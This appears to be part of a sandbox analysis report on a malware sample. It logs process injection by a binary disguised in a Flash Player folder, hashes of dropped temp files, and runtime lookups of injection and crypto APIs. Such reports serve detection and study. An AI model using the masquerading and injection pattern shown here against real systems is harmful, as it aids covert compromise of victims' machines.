private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 126 entries are omitted.
The remaining entries can be found in flog.txt.
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x70000, size = 114688 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x876c4, size = 4 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x877d0, size = 4 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x87d38, size = 4 True 1
Fn
Data
Create Remote Thread #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x795bc True 1
Fn
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb092.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb0a3.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb0a4.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb0a5.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabb0a6.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp 0.17 KB (171 bytes) MD5: 1142692290abc4073f6cb4f996e782fa
SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730
SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt 0.19 KB (192 bytes) MD5: 23e04d8ef7cca29b1eeff7fa22c0c8e0
SHA1: 6af5fc031b6f31cef4e14b7056ea07441a79fbe9
SHA256: 73794646c8afa7e919476ff8095e4f5f2dd0caa3dfb7badc8620eb36b81c6307
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt 0.19 KB (192 bytes) MD5: 948a64299b0f13ef15d1534c929c8908
SHA1: 707d2546cb7e3d6ef30084fa817b068ba299b48d
SHA256: a84e628a54c5000e94bf8026a5ccdd062d100a5c9f22827548b8eab8d745503c
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt 0.19 KB (192 bytes) MD5: 082e064c3b994a31dc76874b48a6033d
SHA1: 5df5d513919f2c5373e46f4274c0ca043ec2d074
SHA256: 9a22b3e989be91a1ea151037471a153ef989117bb1215488e7e7c62f78c3424d
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt 0.19 KB (192 bytes) MD5: 80fa0fcd69c77d3f984d712e6741c5b6
SHA1: a4a473c7457f6ef5ac8b037096151ee812c0547d
SHA256: c8f0e774f0ee04169b6dcb3c97df5b1c99325406fddd9afbe2039bbe0eebe74a
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt 0.09 KB (88 bytes) MD5: 105ef3c8c5656d44bb9c7221446103cc
SHA1: 0a1aa89639d01e9ab3a76b0bc22911ec5033bc17
SHA256: bc9e231394912761cdff92d2ba0ccfe6ed8427198c17eb3e65b23e62d8c8d962
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt 0.19 KB (192 bytes) MD5: 6928ee150e77b6e370de79ff6ba859e2
SHA1: e200706435642973086f3659903ddcabf59d894f
SHA256: f0e4ff028c7f7c9a09ea8b29458ef9269108598cbdba2a50f384e6af67819c96
False
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp 12.41 KB (12707 bytes) MD5: 60492a553dc3492eaea00299b9976477
SHA1: 296392a97cf91096c931293099654ac50dae95f3
SHA256: 8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4
False
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp 0.20 KB (207 bytes) MD5: c8c975ff6c535bb9e0d34a332b334e8f
SHA1: 5bcbf5c63be57bb1512270a904424352081ab0ba
SHA256: 863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe
False
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp 0.07 KB (68 bytes) MD5: 7f420b843841e2e85c7a9c66d0d02fa4
SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69
SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c
False
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp 0.07 KB (68 bytes) MD5: 7f420b843841e2e85c7a9c66d0d02fa4
SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69
SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c
False
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp 0.31 KB (319 bytes) MD5: 8f44eaade8a98a128f71e04667af8328
SHA1: 36ed9ceced094ab5345b34dc008176132de28716
SHA256: 1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba
False
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp 0.20 KB (207 bytes) MD5: 497bb917bc24b0023d281c2fc2c236af
SHA1: 1c86d43980e988bfcabf57104b2101024696c184
SHA256: a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a
False
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp 0.01 KB (8 bytes) MD5: 7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc
SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f
False
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp 1.05 KB (1072 bytes) MD5: aac3de092af58ca64dab1cc4b2186c5e
SHA1: 084512759ab2be3358f3bd1c3c4ef2f88871d01f
SHA256: 12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt 391.61 KB (401004 bytes) MD5: f6e12d2f070ce6a5936fbed778034d4e
SHA1: 23f94e36ddf66ba3e25236ecc83d63fefea9dd77
SHA256: 1716764c1a99963323a4aa287ff8afe97385d4006ae778882ce7597336fa78b0
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt 487.84 KB (499544 bytes) MD5: 3e7b96a26127f8bbe978d5ec0ab2183c
SHA1: 707584fae1eee0b149da3e3d4c520b510ec6128b
SHA256: 8153879cf65226d01cfbc3962edde75fcd3da186adb1d73c3be1b5908517fd26
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt 20.77 KB (21272 bytes) MD5: dc4ceb44d8bb1310e487d691de717647
SHA1: 6fb5662a14a79f7908b673bce6f5f44cb02b6cf1
SHA256: 8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d
False
Threads
Thread 0x538
(Host: 230, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
